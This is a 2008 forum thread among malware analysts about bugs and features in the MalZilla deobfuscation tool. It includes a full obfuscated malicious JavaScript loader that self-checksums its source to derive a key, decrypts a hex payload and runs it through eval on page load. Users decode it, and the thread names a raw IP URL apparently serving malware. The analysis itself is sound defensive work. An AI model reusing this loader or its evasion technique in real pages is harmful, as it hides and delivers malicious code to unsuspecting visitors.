Author Topic: MalZilla  (Read 127692 times)

0 Members and 1 Guest are viewing this topic.

February 15, 2008, 01:55:06 am
Reply #15

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
Debugger:
I like the idea of a seperate button or control to decide whether or not to use the debugger.

Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valueable anyway (I don't mind if you have to redownload pages every time- after all, we're looking for malware, not browsing the web).

Clipboard:
I'll investigate further, but i'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)

TJS

February 15, 2008, 02:50:02 am
Reply #16

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
No problem. When the full-string is ready, just mention me.

and about the Clipboard Monitor problem. I've came across it sometimes under Vista. Just as click "send to decoder" popups "can't open clipboard".

debugger is a bonus originally.  ::) I found it in one analysis condition.

I also recommend that clipboard feature disabled by default. because when I use other tools it made me confused.

best regards,
jimmyleo

February 15, 2008, 06:44:31 pm
Reply #17

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
I'm running into a new issue with 0.9.2.1pre

I constantly paste URLs without www or http by mistake (usually IP based) causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:

(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000

Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php

Thanks,
TJS

February 15, 2008, 07:22:02 pm
Reply #18

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Did there was anything on that address at the time you try it, or it was a 404 error page?

If there was some content, can you please upload it for me to test it?

I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent the Malzilla's crash if I can localize the error you got.

February 16, 2008, 08:42:09 am
Reply #19

sowhat-x

  • Guest
...only 1 request here...what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me a quite a bit of trouble in occasion,
i think it happens sometimes when an address is already filled there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure,I'll have to dig a bit more to check exactly when this happens (under v0.921)  :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing...  :P

February 16, 2008, 08:58:03 am
Reply #20

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
http://rapidshare.com/files/92273310/malzilla.zip.html

Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try replace its functionality in some other way.

February 16, 2008, 09:10:26 am
Reply #21

sowhat-x

  • Guest
Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen!  ;D
Yeap,at least under a first quick glance,copy/pasting urls in this build,
seems to be working in a much better and simpler way...  ::) :)

February 17, 2008, 08:59:26 am
Reply #22

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Grrrr....
Take a look at the script in the attachment (pass= infected).

It is a modified Caesar cipher, that means trivial, but...
The decryption key is created on the fly, and it depends on the function length (arguments.calee thing).

The function is full with redundant operations and variables (used nowhere), just to make the analyst mad.

That is the kind of script I mentioned a couple of posts ago:
Quote
ToDo list:

====
Lately I see a lot of scripts using arguments.calee().toString in a way which obviously gives very funny results in Malzilla.
(I guess all of you already knows this, but...) arguments.calee().toString differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in the way that is making the script "IE-only".
I already know what to try, I just need some time to test my idea.

Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.

If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code one brute-forcer for this (EXE, not script).

February 18, 2008, 05:10:54 am
Reply #23

Drusepth

  • Special Members
  • Full Member

  • Offline
  • *

  • 57
  • Personal Text
    Drusepth
    • Drusepth.net
I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out if you just wanted to find out what it is that the function is running, you can take a glimpse at the very end:
Code: [Select]
eval(h8TbWsRTn);}It's going to run whatever is in the h7TbWsRTn variable (this is after it's been decrypted).  Instead, we can modify the code to just print it out to the screen:
Code: [Select]
document.write(h8TbWsRTn);}But, this doesn't come out clean:
Quote from: Output
elkMvmrlCc_Sn;fri%QJp[LR:G.+y_q^0f7f36<`'cvjsl\k^u2f_kcbO0xrQsifXi,,,q\mVcgh&.STi0*%(%qYWtscq:^]g,,9uXo s5:a0GM2S?y_qA!m67KtNC%xeuf[4]89|3n4^0f7f36<`niqes_8`cv#_d-U"wf{K:m^\"qYOQak.vx@%&2sKt${06je,7Lj;m\t Cvu_x&%hsu&C.h6QxUE4-%F;n03DrAH@5352A!m67KtNC--{06je,7LjYC.h6QxUET:=zdph.!e5SNGH:=jrp';4U48PsV=:4<>B6b/OyZD:;4U48PsV=;(?5,zh.!e5SNGH:s5:a0GM2SBA<0 [*u45b(M:JU)/(60#:<571*5<4,9efokPJj4HLOYA39hCDV7URcV3/8?lJFc2;QiZ)<;4U48PsV='+$~v1.pRD9KeZ`I1n9TMdN(.9o52LlT0_A+v1.pRD9KeZ`I1n9TMdNZHs5:a0GM2S->ge%b4;vfA,EQ]mOEk,N9g[.B6b/OyZD\9 2-#yw)4]jF8FfRf6Ip8ON\TF;n03DrAHa.;3)6;::08-8gdc5O5_d|P;3)6;::08,8Pqv+o0.`RTKO<'8[3;f/OGE;>kg5r-2c7s>o0.`RTKO*"&eci9V7l_bOA{06je,7LjY'Xb Z\te|&(2sKt$jb6j3{9r;`\3B:yevL%iOpkwf:]l\*H:i1+J_YJ@.:;4U48PsV=9"=H:i1+J_YJ.)(x`cv#Fb(-G|56<^a!u:8w4f(.9o52LlT0=jwS1ZtLT^B6b/OyZD\4.%hxX0bn14R_G5j)17w[I[<'8`cv#BAD@O2X53:m^\"LpOAX_Ns:>t`i;zLPaw_0=kg5r-2c7s@eGcU8UGMB-cbXixk9PoE7e|k114dN9w93x,l%XTvR3>4=nA4/1*8@RwW2F.PV?U{FLZuR56>dni%.9o52LlT0?4>B6b/OyZD;^a!u:8w4f8.9o52LlT0-A5'zm^\"{\1G[cAyk@eGcU8UGMB-jrLuxu&C.h6QxUE#/=HEKB\->49@n`ipOKrw&vP02fjZuf#. +?KkP9^Lfu9;C9J-g4W04$c^:EDo2FeEQWoMG+2X:a>geEWSFd`ch3&2-#yGdN,cfgo54EWSFd`ch34999|dS;TnqBsk('Uxugm^+PtspAgXo-qhh&GdN,cfgo5 8;zLPaw_0-/>TOjQI;Vj<*5#3?ld'FPVQL73m/9Pv4=nA4.8)8PvY5av+G:]H:i1+J_YJ`;1'8g"ioqdx9UpRF3,k"?4>TOjQI;Vj<;4U48PsV=8giy_kj@SVmlCkq= JelNT:lvp'0P6G7_`/6KC882A04P;4E56/30;i<35*3086d3@(6Mc;d/@/^d:9D8,>,;;<3A.6!:;db8.> ;;D0a.2K88e28,>,;fD2a.28F:a2]15j6C3Z^":j;d@/408<75,2O86916:6Kc<<38-6D8d_`)>.788B6\0P6G7_@/5 :4D?703"ciD05'>-;;d67+> D:e1896,c;d6`/2+88e2@+6-789.5*2:5e35=3,89976.39;:15048F8?A,3P9::05/3K8;9?683#9;:34/^8j936-3K9::5593#8F9A6,2"d4:c5,3/899B6.3 99:25.20;<6aZ3C7e/@)6Oc4<67-6+cfDB8-3c<;/8(>":<:58<6K7F9D4'0M)->

So right now I'm looking at the code to see how it is actually working.  It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.

Anyway, first I'm just cleaning up the code.  I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.

Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
Code: [Select]
<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ (dp58428V3) {
var m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var A7ck1Wh8H;
var B2t331TL0;
var NisOkeH61 = m6K3yhq2K.length;
var Xn47RT3Sm;
var h8TbWsRTn='';
var PkKX3bWF0 = new Array();
for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
PkKX3bWF0[B2t331TL0]=0;
}
var A7ck1Wh8H = 1;
for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
A7ck1Wh8H = (A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);
for (i5G3CC1F6=0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);
if (PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0) {
PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
}
}
}
Xn47RT3Sm = 4294967295;
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
var eXK5vvK0K = new Array();
var Y37iVA85C = 2323;
Xn47RT3Sm = Xn47RT3Sm^4294967295;
if (Xn47RT3Sm < 0) {
Xn47RT3Sm += 4294967296;
}
Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
var sNImKPP0N = new Array();
var NisOkeH61 = Xn47RT3Sm.length;
for (B2t331TL0=0; B2t331TL0 < 8; B2t331TL0++) {
var LS0E1DrB3 = NisOkeH61+B2t331TL0;
eXK5vvK0K[B2t331TL0] = 1;
eXK5vvK0K[B2t331TL0] = Y37iVA85C;
if (LS0E1DrB3 >= 8) {
LS0E1DrB3 = LS0E1DrB3 - 8;
sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
} else {
sNImKPP0N[B2t331TL0] = 48;
}
}
var vM4s1CVcM = 0;
var ahE3xpv6w;
var L3KsBg108;
var v65y6Hs6a;
NisOkeH61 = dp58428V3.length;
v65y6Hs6a = NisOkeH61;
Y37iVA85C = 1123;
Y37iVA85C = v65y6Hs6a;
for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2){
var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
ahE3xpv6w = parseInt(QgQRdYhu8,16);
L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
if (L3KsBg108 < 0) {
L3KsBg108 = L3KsBg108 + 256;
}
h8TbWsRTn += String.fromCharCode(L3KsBg108);
v65y6Hs6a++;
Y37iVA85C = 3891;
if (vM4s1CVcM < sNImKPP0N.length - 1) {
vM4s1CVcM++;
Y37iVA85C = 1092;
eXK5vvK0K[B2t331TL0] = 20;
} else {
vM4s1CVcM=0;
Y37iVA85C=B2t331TL0;
}
}
eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">

</body>
</html>

Step 2: Replace variable names with normal ones, and remove obvious redundancy
Code: [Select]
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
var variable1 = arguments.callee.toString().replace(/\W/g,'').toUpperCase();
var i; // Used in for loops
var variable4 = variable1.length; // .lengths of various vars
var variable6 = '';
var array1 = new Array();
for (i = 0; i < 256; i++) {
array1[i] = 0;
}
var variable2 = 1;
for (i = 128; i; i >>= 1) {
variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);
for (j = 0; j < 256; j += (i * 2)) {
array1[j + i] = (array1[j]^variable2);
if (array1[j+i] < 0) {
array1[j + i] += 4294967296;
}
}
}
var variable5 = 4294967295;
for(variable2 = 0; variable2 < variable4; variable2++) {
variable5 = array1[(variable5^variable1.charCodeAt(variable2))&255]^((variable5>>8)&16777215);
}
var array2 = new Array();
variable5 = variable5^4294967295;
if (variable5 < 0) {
variable5 += 4294967296;
}
variable5 = variable5.toString(16).toUpperCase();
var array3 = new Array();
var variable4 = variable5.length;
for (i = 0; i < 8; i++) {
var variable7 = variable4 + i;
array2[i] = 1;
array2[i] = '';
if (variable7 >= 8) {
variable7 = variable7 - 8;
array3[i] = variable5.charCodeAt(variable7);
} else {
array3[i] = 48;
}
}

var variable8 = 0;
var variable10;
variable4 = parameter.length;
var variable13 = 3891;
var variable11 = variable4;
for (i = 0; i < variable4; i += 2){
var variable12 = parameter.substr(i, 2);
variable10 = parseInt(variable12, 16);
if (variable10 < 0) {
variable10 = variable10 + 256;
}
variable6 += String.fromCharCode(variable10);
variable11++;
if (variable8 < array3.length - 1) {
variable8++;
variable13 = 1092;
array2[i] = 20;
} else {
variable8 = 0;
variable13 = i;
}
}
eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">

</body>
</html>

And now is where the drudgework of tracing each variable as it's thrown around comes in...  I think I'll save it for the morning or tomorrow. 

A few things I would like to point about prerequisites for the string passed to the javascript function:
- It needs to be a longer string.  "hellohellohellohello" works, when "hello" returns nothing.  ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines being passed to it.
- The line "variable10 = variable10 + 256;" is bringing characters being made up above 256, no matter what.  AKA it's up to unicode
http://unicode.org/charts/

February 18, 2008, 08:34:49 am
Reply #24

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
hello bobby

I've came across these issue many times recently.
I and my friend dikex found a way to decode it in script way we used to do.

because it call itself, so we throw it into a variable without changing. eg. var a="....";
and replace "arguments.callee" with the variable.
and we can do what we want to do. eg. replace eval() to ... method.

have fun!

best regards,
jimmyleo

February 18, 2008, 04:17:57 pm
Reply #25

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Hi Drusepth, hi jimmyleo,

You can't make any single change in the script because it does not check only the length of the function, but it check every single character:
Code: [Select]
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
So, if Xn47RT3Sm does not have expected value at the end of the loop, it means something is changed in the script, and the decoding will not succeed. Just with proper value of this variable the data will decode like it should.

So, I have asked on other board for advice, and I was told to use the oldest trick in decoding - override eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
Code: [Select]
function eval(a) {document.write(a)};
This is re-definition of eval() function, so the eval will in the fact call document.write.

This is the only working method for this kind of scripts.

If you use this on other script, just be sure that the script does not do another overriding of eval() (or of any other internal function), after your overriding.

best regards
bobby

February 19, 2008, 07:42:54 am
Reply #26

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
because it does not check only the length of the function, but it check every single character:

oh ,bobby:
You may not looked my reply carefully. :P
Quote
so we throw it into a variable without changing

February 19, 2008, 07:11:12 pm
Reply #27

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
@jimmyleo

Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example where you can show what are you exactly doing with arguments.callee?

February 20, 2008, 02:24:15 am
Reply #28

jimmyleo

  • Special Members
  • Jr. Member

  • Offline
  • *

  • 29
it may helps you.

you can do it one step by one until the result reveal.

regards,
jimmyleo

February 25, 2008, 12:01:39 pm
Reply #29

tjs

  • Special Members
  • Sr. Member

  • Offline
  • *

  • 248
I have a bug and feature suggestion related to the 'send to decoder' feature:

* send script to decoder breaks when a script src is closed.. ex:
   <script src="poked.js" language="JavaScript"></script>
   malzilla thinks the script starts after </script> till EOF

* send script to decoder can be improved on pages with multiple <script>
   <script>foo;</script><script>bar;</script>
   it would be nice to have a feature to send ALL scripts to decoder

Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com

Thanks,
TJS